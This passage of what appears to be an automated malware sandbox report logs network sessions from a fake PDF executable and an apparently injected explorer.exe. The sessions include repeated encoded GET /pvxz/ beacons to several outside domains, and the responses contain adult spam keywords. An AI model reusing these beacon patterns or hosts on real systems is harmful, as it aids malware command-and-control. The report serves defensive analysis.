20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65 Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some
Dec 1, 2021 16:27:07.285675049 CET	8684	IN	Data Raw: 74 68 69 6e 67 20 6c 6f 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 Data Ascii: thing lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxc
Dec 1, 2021 16:27:07.285686970 CET	8684	IN	Data Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: </div> </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49754	162.159.129.233	443	C:\Users\user\Desktop\DOC209272621615.PDF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49757	162.159.130.233	443	C:\Users\user\Contacts\Wkklnmcz.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49807	23.224.31.114	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:24:49.547094107 CET	8578	OUT	GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=kv1trFZowiadIe+O9wf8jU76F0yWsAfdW5MSCImgWwgiD9GBizL2DmUTWvRLYZu8pEo+ HTTP/1.1 Host: www.ncgf08.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 16:24:49.708903074 CET	8579	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 01 Dec 2021 15:24:49 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.ncgf08.xyz/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=kv1trFZowiadIe+O9wf8jU76F0yWsAfdW5MSCImgWwgiD9GBizL2DmUTWvRLYZu8pEo+ Strict-Transport-Security: max-age=31536000; includeSubdomains; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49808	2.57.90.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:24:54.802287102 CET	8580	OUT	GET /pvxz/?e0DDHLix=TAqp8mx20QUzgyvQGraUKSgK7ecLW6Kyu1royTDzc6juJCT2xEuV+4TJn9imIiw/7sSq&_FN4W=CV_PbjYpbVj HTTP/1.1 Host: www.sa-pontianak.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 16:24:54.839745045 CET	8580	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Dec 2021 15:24:54 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49809	154.81.158.75	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:25:00.226923943 CET	8581	OUT	GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=gP6rjQtpXSIvmASTmEYziIOwC4Gfkrp9Oew9+ghHkWFgU4GrN+F2/eFp8+5BM1VAZDt9 HTTP/1.1 Host: www.hbjngs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 16:25:00.421998024 CET	8582	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 01 Dec 2021 15:24:38 GMT Content-Type: text/html Content-Length: 1968 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 ba aa b5 a6 b9 d3 d6 cc d0 c5 cf a2 bf c6 bc bc d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 33 35 36 37 3b 26 23 32 30 31 38 35 3b 26 23 32 32 38 39 39 3b 26 23 33 33 32 35 38 3b 26 23 32 34 39 34 34 3b 26 23 32 31 36 32 37 3b 26 23 32 31 35 33 35 3b 26 23 32 37 39 36 39 3b 26 23 33 30 33 33 33 3b 26 23 32 37 39 37 34 3b 2c 26 23 32 32 38 32 36 3b 26 23 33 31 38 39 35 3b 26 23 32 32 38 32 36 3b 26 23 33 30 38 32 38 3b 26 23 32 33 35 36 37 3b 26 23 32 33 35 32 31 3b 26 23 32 32 39 31 39 3b 26 23 32 31 34 36 33 3b 26 23 31 39 39 38 31 3b 26 23 32 30 31 30 32 3b 2c 26 23 31 32 34 3b 26 23 35 31 3b 26 23 35 35 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 32 39 30 35 3b 26 23 32 30 33 30 37 3b 26 23 32 35 36 36 38 3b 26 23 32 34 34 33 33 3b 2c 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 33 33 33 39 34 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 33 35 36 37 3b 26 23 32 30 31 38 35 3b 26 23 32 32 38 39 39 3b 26 23 33 33 32 35 38 3b 26 23 32 34 39 34 34 3b 26 23 32 31 36 32 37 3b 26 23 32 31 35 33 35 3b 26 23 32 37 39 36 39 3b 26 23 33 30 33 33 33 3b 26 23 32 37 39 37 34 3b 2c 26 23 32 32 38 32 36 3b 26 23 33 31 38 39 35 3b 26 23 32 32 38 32 36 3b 26 23 33 30 38 32 38 3b 26 23 32 33 35 36 37 3b 26 23 32 33 35 32 31 3b 26 23 32 32 39 31 39 3b 26 23 32 31 34 36 33 3b 26 23 31 39 39 38 31 3b 26 23 32 30 31 30 32 3b 2c 26 23 31 32 34 3b 26 23 35 31 3b 26 23 35 35 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 32 39 30 35 3b 26 23 32 30 33 30 37 3b 26 23 32 35 36 36 38 3b 26 23 32 34 34 33 33 3b 2c 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 32 34 36 31 35 3b 26 23 33 33 33 39 34 3b 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 35 34 3b 26 23 35 37 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 33 35 36 37 3b 26 23 32 30 31 38 35 3b 26 23 32 32 38 39 39 3b 26 23 33 33 32 35 38 3b 26 23 32 34 39 34 34 3b 26 23 32 31 36 32 37 3b 26 23 32 31 35 33 35 3b 26 23 32 37 39 36 39 3b 26 23 33 30 33 33 33 3b 26 23 32 37 39 37 34 3b 2c 26 23 32 32 38 32 36 3b 26 23 33 31 38 39 35 3b 26 23 32 32 38 32 36 3b 26 23 33 30 38 32 38 3b 26 23 32 33 35 36 37 3b 26 23 32 33 35 32 31 3b 26 23 32 32 39 31 39 3b 26 23 32 31 34 36 33 3b 26 23 31 39 39 38 31 3b 26 23 32 30 31 30 32 3b 2c 26 23 31 32 34 3b 26 23 35 31 3b 26 23 35 35 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 32 39 30 35 3b 26 23 32 30 33 30 37 3b 26 23 32 35 36 36 38 3b 26 23 32 34 34 33 33 3b 2c 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 35 31 30 34 3b 26 23 32 30 31 35 34 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#23567;&#20185;&#22899;&#33258;&#24944;&#21627;&#21535;&#27969;&#30333;&#27974;,&#22826;&#31895;&#22826;&#30828;&#23567;&#23521;&#22919;&#21463;&#19981;&#20102;,&#124;&#51;&#55;&#26085;&#26412;&#32905;&#20307;&#25668;&#24433;,&#26085;&#26412;&#88;&#88;&#88;&#88;&#33394;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;&#20813;&#36153;</title><meta name="keywords" content="&#23567;&#20185;&#22899;&#33258;&#24944;&#21627;&#21535;&#27969;&#30333;&#27974;,&#22826;&#31895;&#22826;&#30828;&#23567;&#23521;&#22919;&#21463;&#19981;&#20102;,&#124;&#51;&#55;&#26085;&#26412;&#32905;&#20307;&#25668;&#24433;,&#27431;&#32654;&#24615;&#33394;&#27431;&#32654;&#31934;&#21697;&#35270;&#39057;&#54;&#57;" /><meta name="description" content="&#23567;&#20185;&#22899;&#33258;&#24944;&#21627;&#21535;&#27969;&#30333;&#27974;,&#22826;&#31895;&#22826;&#30828;&#23567;&#23521;&#22919;&#21463;&#19981;&#20102;,&#124;&#51;&#55;&#26085;&#26412;&#32905;&#20307;&#25668;&#24433;,&#20813;&#36153;&#22269;&#20135;&#25104;&#20154;&#39640;&#28165;&#22312;&#32447;&#32593;&#31449;,
Dec 1, 2021 16:25:00.422022104 CET	8583	IN	Data Raw: 26 23 32 34 30 34 30 3b 26 23 33 33 30 31 36 3b 26 23 33 32 36 35 34 3b 26 23 32 30 30 38 33 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 Data Ascii: &#24040;&#33016;&#32654;&#20083;&#26080;&#30721;&#20154;&#22971;&#35270;&#39057;,&#22269;&#20135;&#31934;&#21697;&#26377;&#30721;&#26080;&#30721;&#65;&#86;&#22312;&#32447;&#25773;&#25918;,&#20122;&#27954;&#22270;&#29255;&#26657;&#22253;&#21478

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49810	163.44.239.73	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:25:06.424876928 CET	8584	OUT	GET /pvxz/?e0DDHLix=T99sF+FFCMRVIrN5sJoW9bSX1euAJ0OSqUAUXGTCOoP2/2ZrE3P4zH5359id1TPJ7WYx&_FN4W=CV_PbjYpbVj HTTP/1.1 Host: www.sumikkoremon.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 16:25:06.902086020 CET	8585	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html; charset=UTF-8 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://sumikkoremon.com/wp-json/>; rel="https://api.w.org/" content-length: 5784 date: Wed, 01 Dec 2021 15:25:06 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 3c 6c 69 6e 6b 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 75 6d 69 6b 6b 6f 72 65 6d 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 61 75 74 6f 70 74 69 6d 69 7a 65 2f 63 73 73 2f 61 75 74 6f 70 74 69 6d 69 7a 65 5f 66 39 66 30 65 64 63 64 65 65 37 30 64 63 63 36 38 32 36 66 33 61 38 30 65 32 35 35 33 66 63 34 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 6d 69 6b 6b 6f 72 65 6d 6f 6e 2e 63 6f 6d 2f 34 30 34 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 22 3e 20 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 75 6d 69 6b 6b 6f 72 65 6d 6f 6e 2e 63 6f 6d 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 27 20 2f 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 27 61 6e 6f 6e 79 6d 6f 75 73 27 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 2f 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 2f 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 e3 81 99 Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1" /><link media="all" href="http://sumikkoremon.com/wp-content/cache/autoptimize/css/autoptimize_f9f0edcdee70dcc6826f3a80e2553fc4.css" rel="stylesheet" /><title></title><meta name="robots" content="noindex,nofollow"><link rel="canonical" href="https://sumikkoremon.com/404"><link rel="shortcut icon" href=""> ...[if IE]><link rel="shortcut icon" href=""> <![endif]--><link rel="apple-touch-icon" href="" /><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//sumikkoremon.com' /><link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /><link href='https://fonts.gstatic.com' crossorigin='anonymous' rel='preconnect' /><link href='https://ajax.googleapis.com' rel='preconnect' /><link href='https://fonts.googleapis.com' rel='preconnect' /><link rel="alternate" type="application/rss+xml" title="
Dec 1, 2021 16:25:06.902127981 CET	8587	IN	Data Raw: e3 81 bf e3 81 a3 e3 81 93 e3 83 ac e3 83 a2 e3 83 b3 e3 81 ae e3 83 96 e3 83 ad e3 82 b0 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 6d 69 6b 6b 6f 72 65 6d 6f 6e 2e 63 6f Data Ascii: &raquo; " href="https://sumikkoremon.com/feed" /><link rel="alternate" type="application/rss+xml" title=" &raquo; " href="https://sumikkoremon.
Dec 1, 2021 16:25:06.902143955 CET	8588	IN	Data Raw: 65 72 5f 73 6d 61 6c 6c 5f 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 69 64 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e e3 81 99 e3 81 bf e3 81 a3 e3 81 93 e3 81 a7 e5 91 9f e3 81 8d e3 81 be e3 81 99 3c 2f 64 69 76 3e 3c 6e 61 76 20 63 6c 61 73 Data Ascii: er_small_content"><div id="description"></div><nav class="header_small_menu_right" role="navigation" itemscope="itemscope" itemtype="http://scheme.org/SiteNavigationElement"></nav></div></div><div class="header-logo
Dec 1, 2021 16:25:06.902160883 CET	8589	IN	Data Raw: 9f e5 8f af e8 83 bd e6 80 a7 e3 81 8c e3 81 82 e3 82 8a e3 81 be e3 81 99 e3 80 82 3c 2f 64 69 76 3e 3c 66 6f 72 6d 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 66 6f Data Ascii: </div><form role="search" method="get" class="searchform" class="notfofund_search aligncenter" action="https://sumikkoremon.com/" > <input type="text" placeholder="" value="" name="s" class="s" /> <input type
Dec 1, 2021 16:25:06.902179956 CET	8590	IN	Data Raw: 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 73 74 61 74 73 2e 77 70 2e 63 6f 6d 2f 65 2d 32 30 32 31 34 38 2e 6a 73 27 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 3e 5f 73 74 71 Data Ascii: cript> <script src='https://stats.wp.com/e-202148.js' defer></script> <script>_stq = window._stq || [];_stq.push([ 'view', {v:'ext',j:'1:10.1',blog:'197750087',post:'0',tz:'0',srv:'sumikkoremon.com'} ]);_stq.push([ 'clickTrackerInit', '197

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49820	156.67.222.132	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:25:12.185509920 CET	8614	OUT	GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=9jDi6R9VCoWG4rsAVGD1PHclw17CfU64luC7Gj+dkvBZl+crlrbAkIZhlDMaD53GUfpv HTTP/1.1 Host: www.tourbox.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 16:25:12.374897957 CET	8618	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Tue, 25 Jun 2019 07:07:19 GMT etag: "999-5d11c827-698982c0c6efc961;;;" accept-ranges: bytes content-length: 2457 date: Wed, 01 Dec 2021 15:25:12 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65 Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta 